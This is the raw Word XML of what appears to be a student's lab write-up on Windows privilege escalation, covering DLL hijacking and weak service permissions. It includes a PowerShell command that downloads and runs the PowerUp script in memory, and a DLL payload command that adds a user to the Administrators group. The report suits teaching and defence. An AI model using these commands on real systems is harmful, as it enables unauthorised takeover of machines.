    <w:p w14:paraId="06658AB6" w14:textId="1914DDEE" w:rsidR="00853426" w:rsidRDefault="00853426" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="547FCF3C" w14:textId="77777777" w:rsidR="001E2D08" w:rsidRDefault="001E2D08" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>We can run this command to check the all vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6F2954" w14:textId="77777777" w:rsidR="001E2D08" w:rsidRDefault="001E2D08" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E2D08">
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E2D08">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E2D08">
        <w:t>nop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E2D08">
        <w:t xml:space="preserve"> -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E2D08">
        <w:t>AllChecks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="16576C59" w14:textId="77777777" w:rsidR="001E2D08" w:rsidRDefault="001E2D08" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B9AF31B" wp14:editId="19106B17">
            <wp:extent cx="5943600" cy="670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70560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5092AC1B" w14:textId="51CCA85B" w:rsidR="001E2D08" w:rsidRDefault="001E2D08" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5762FB5D" wp14:editId="477A92B0">
            <wp:extent cx="5943600" cy="7581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58190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33637B92" w14:textId="1B9FE6DD" w:rsidR="0043122C" w:rsidRDefault="00E476B2" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>So,</w:t>
      </w:r>
      <w:r w:rsidR="0043122C">
        <w:t xml:space="preserve"> we can see </w:t>
      </w:r>
      <w:r w:rsidR="00C63B72">
        <w:t xml:space="preserve">the Hijack path </w:t>
      </w:r>
      <w:r w:rsidR="008F5A75">
        <w:t>= “C:\Temp\”</w:t>
      </w:r>
      <w:r w:rsidR="003B668C">
        <w:t xml:space="preserve"> we can run </w:t>
      </w:r>
      <w:r w:rsidR="00E16537" w:rsidRPr="00E16537">
        <w:t>malicious</w:t>
      </w:r>
      <w:r w:rsidR="00E16537">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E16537">
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E16537">
        <w:t xml:space="preserve"> in that location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48403F67" w14:textId="77777777" w:rsidR="00F6272D" w:rsidRDefault="00F6272D" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BC36136" w14:textId="57D26AF0" w:rsidR="00D629C4" w:rsidRDefault="001C2900" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662848" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="71695669" wp14:editId="3508BB10">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-182880</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>288925</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6537960" cy="13258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37960" cy="1325880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00D629C4">
        <w:t xml:space="preserve">Search the service called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D629C4">
        <w:t>dllsvc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D629C4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, because in bat file create new service called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dllsvc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72A4F2C5" w14:textId="64276ECC" w:rsidR="001C2900" w:rsidRDefault="001C2900" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="009EEFCA" w14:textId="2AFD122E" w:rsidR="001C2900" w:rsidRDefault="001C2900" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49AF3F7C" w14:textId="3CB9792A" w:rsidR="001C2900" w:rsidRDefault="001C2900" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="326A0BDD" w14:textId="32FF5415" w:rsidR="001C2900" w:rsidRDefault="001C2900" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="084985DF" w14:textId="63CD2596" w:rsidR="00F6272D" w:rsidRDefault="00F6272D" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5027DD28" w14:textId="245C366D" w:rsidR="00F6272D" w:rsidRDefault="00F6272D" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00A0C6D9" w14:textId="77777777" w:rsidR="00F6272D" w:rsidRDefault="00F6272D" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54F19A98" w14:textId="53C4936E" w:rsidR="00F6272D" w:rsidRDefault="00F6272D" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3758D77A" wp14:editId="08BBD5A3">
            <wp:extent cx="5943600" cy="19361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36115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCBE846" w14:textId="729ABF8F" w:rsidR="001C2900" w:rsidRDefault="001C2900" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EFD2735" w14:textId="15257FC3" w:rsidR="001C2900" w:rsidRDefault="00BF3D55" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Check the process called “dllhijackservice.exe” using </w:t>
      </w:r>
      <w:r w:rsidR="00BF33AF">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>procmon</w:t>
      </w:r>
      <w:r w:rsidR="00BF33AF">
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E60847C" wp14:editId="27C7460A">
            <wp:extent cx="5000625" cy="3133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3133725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A8C3DD" w14:textId="22BAC609" w:rsidR="00BF3D55" w:rsidRDefault="00BF3D55" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E4979A9" wp14:editId="73CD36C3">
            <wp:extent cx="4933950" cy="2981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3950" cy="2981325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="724C1006" w14:textId="6E832600" w:rsidR="00BF3D55" w:rsidRDefault="001E2D08" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AE806D3" wp14:editId="278B69B0">
            <wp:extent cx="5943600" cy="1342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42390"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3855C3DD" w14:textId="04F21087" w:rsidR="00426FF6" w:rsidRDefault="00426FF6" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5570CA6E" w14:textId="55374017" w:rsidR="00426FF6" w:rsidRDefault="00426FF6" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43A287EC" wp14:editId="1226EEDE">
            <wp:extent cx="5943600" cy="167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76400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD267B2" w14:textId="302AAF78" w:rsidR="00D7661C" w:rsidRDefault="00CF65CF" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I create the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file in after running that </w:t>
      </w:r>
      <w:r w:rsidR="00171E85">
        <w:t xml:space="preserve">service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00171E85">
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> run “</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF65CF">
        <w:t xml:space="preserve">cmd.exe /k net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF65CF">
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF65CF">
        <w:t xml:space="preserve"> administrator user /add</w:t>
      </w:r>
      <w:r>
        <w:t>” it means user add to the administrator group</w:t>
      </w:r>
      <w:r w:rsidR="00426FF6">
        <w:t xml:space="preserve"> after editing that script that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00426FF6">
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00426FF6">
        <w:t xml:space="preserve"> must save “hijackme.dll”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A38EFE" w14:textId="79294FD5" w:rsidR="00D7661C" w:rsidRDefault="00D7661C" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5073D9CB" wp14:editId="28B48B6E">
            <wp:extent cx="5943600" cy="24542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54275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E8A852" w14:textId="4DFD211F" w:rsidR="00171E85" w:rsidRDefault="00426FF6" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1085A062" wp14:editId="356AEC19">
            <wp:extent cx="5943600" cy="1448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48435"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EC8685" w14:textId="27A09EFA" w:rsidR="003D3C66" w:rsidRDefault="003D3C66" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57FF9371" wp14:editId="30EB1D3F">
            <wp:extent cx="5943600" cy="24542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54275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C256784" w14:textId="5F48A78E" w:rsidR="00171E85" w:rsidRDefault="00171E85" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After copying to windows </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> stop the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dllsvc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and again start that service </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E928EFF" w14:textId="3BF0E1E2" w:rsidR="00171E85" w:rsidRDefault="003D3C66" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69C3C5A6" wp14:editId="2620307D">
            <wp:extent cx="5943600" cy="40246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24630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71958EEA" w14:textId="77777777" w:rsidR="003D3C66" w:rsidRDefault="003D3C66" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>So now he in Administrators group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EBED70" w14:textId="77777777" w:rsidR="003D3C66" w:rsidRDefault="003D3C66" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79194A66" w14:textId="77777777" w:rsidR="003D3C66" w:rsidRDefault="003D3C66" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C5D23FC" w14:textId="77777777" w:rsidR="003D3C66" w:rsidRDefault="003D3C66" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="231676F7" w14:textId="2BE2CD93" w:rsidR="003D3C66" w:rsidRDefault="00241C0F" w:rsidP="00241C0F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00241C0F">
        <w:lastRenderedPageBreak/>
        <w:t>Exercise 3 – Services (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00241C0F">
        <w:t>binPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00241C0F">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="003D3C66">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F53EAB" w14:textId="6A32EA11" w:rsidR="00E44598" w:rsidRPr="00E44598" w:rsidRDefault="00E44598" w:rsidP="00E44598">
      <w:r>
        <w:t>After running the powerup command we can see service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1FBB89" w14:textId="63639C39" w:rsidR="00E44598" w:rsidRPr="00E44598" w:rsidRDefault="00E44598" w:rsidP="00E44598">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F6D24EC" wp14:editId="68F8CD24">
            <wp:extent cx="5943600" cy="1108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08075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1194DD7F" w14:textId="42D3B6AB" w:rsidR="00932F84" w:rsidRDefault="005B4672" w:rsidP="00241C0F">
      <w:r>
        <w:t xml:space="preserve">After running the “net user user </w:t>
      </w:r>
      <w:r w:rsidR="00932F84">
        <w:t>“command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> he still in user group</w:t>
      </w:r>
      <w:r w:rsidR="00932F84">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004200D6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00932F84">
        <w:t xml:space="preserve">Here is the </w:t>
      </w:r>
      <w:r w:rsidR="00BF33AF">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00932F84">
        <w:t>accesschk</w:t>
      </w:r>
      <w:r w:rsidR="00BF33AF">
        <w:t>64”</w:t>
      </w:r>
      <w:r w:rsidR="00932F84">
        <w:t xml:space="preserve"> command details:</w:t>
      </w:r>
      <w:r w:rsidR="00932F84" w:rsidRPr="00932F84">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidR="00932F84" w:rsidRPr="00140E65">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00932F84">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F22403" w14:textId="3E710A29" w:rsidR="005B4672" w:rsidRDefault="00932F84" w:rsidP="00241C0F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="119FAB9A" wp14:editId="13EC28B1">
            <wp:extent cx="5943600" cy="3263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63900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8ACA7A" w14:textId="0C66CF4D" w:rsidR="004200D6" w:rsidRDefault="004200D6" w:rsidP="00241C0F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663872" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="54A6BF05" wp14:editId="524590E7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-434340</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>414655</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7086600" cy="113538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086600" cy="1135380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00932F84">
        <w:t xml:space="preserve">All user has </w:t>
      </w:r>
      <w:r w:rsidR="00932F84" w:rsidRPr="00932F84">
        <w:t>“SERVICE_CHANGE_CONFIG” permission</w:t>
      </w:r>
      <w:r w:rsidR="00932F84">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> It means </w:t>
      </w:r>
      <w:r w:rsidR="004D2A5D">
        <w:t xml:space="preserve">user </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r w:rsidR="004D2A5D">
        <w:t>re</w:t>
      </w:r>
      <w:r>
        <w:t>configur</w:t>
      </w:r>
      <w:r w:rsidR="004D2A5D">
        <w:t xml:space="preserve">e the </w:t>
      </w:r>
      <w:r>
        <w:t>services</w:t>
      </w:r>
      <w:r w:rsidR="004D2A5D">
        <w:t xml:space="preserve"> binary</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C16404" w14:textId="04D17D8F" w:rsidR="004200D6" w:rsidRDefault="004200D6" w:rsidP="00241C0F"/>
    <w:p w14:paraId="398E1569" w14:textId="77777777" w:rsidR="004200D6" w:rsidRDefault="004200D6" w:rsidP="00241C0F"/>
    <w:p w14:paraId="48A26949" w14:textId="2FEA245F" w:rsidR="004200D6" w:rsidRDefault="004200D6" w:rsidP="00241C0F"/>
    <w:p w14:paraId="381F9A86" w14:textId="253F947A" w:rsidR="00932F84" w:rsidRDefault="00932F84" w:rsidP="00241C0F"/>
    <w:p w14:paraId="7587F3C5" w14:textId="26106310" w:rsidR="00932F84" w:rsidRDefault="00932F84" w:rsidP="00241C0F"/>
    <w:p w14:paraId="507E7B8D" w14:textId="5DB525B7" w:rsidR="00932F84" w:rsidRDefault="004D2A5D" w:rsidP="00241C0F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664896" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4E689577" wp14:editId="0974D392">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>10795</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="854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anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2382035E" w14:textId="51D4C5F5" w:rsidR="004200D6" w:rsidRDefault="004200D6" w:rsidP="00241C0F"/>
    <w:p w14:paraId="6ABB3240" w14:textId="2A83B0D2" w:rsidR="004200D6" w:rsidRDefault="004200D6" w:rsidP="00241C0F"/>
    <w:p w14:paraId="19232D87" w14:textId="5F506A85" w:rsidR="004200D6" w:rsidRDefault="004200D6" w:rsidP="004200D6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="004200D6">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exercise 4 – Services (Unquoted Path</w:t>
      </w:r>
      <w:r w:rsidRPr="004200D6">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B13685A" w14:textId="0A383C44" w:rsidR="00A00F5F" w:rsidRPr="00A00F5F" w:rsidRDefault="00A00F5F" w:rsidP="00A00F5F">
      <w:r>
        <w:t>Powerup script details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C728366" w14:textId="0F5F1F21" w:rsidR="004200D6" w:rsidRDefault="004200D6" w:rsidP="004200D6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07EA882A" wp14:editId="4ABEC39F">
            <wp:extent cx="6248400" cy="1173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48400" cy="1173480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F39E132" w14:textId="13638E45" w:rsidR="00600EAC" w:rsidRDefault="008500A9" w:rsidP="004200D6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
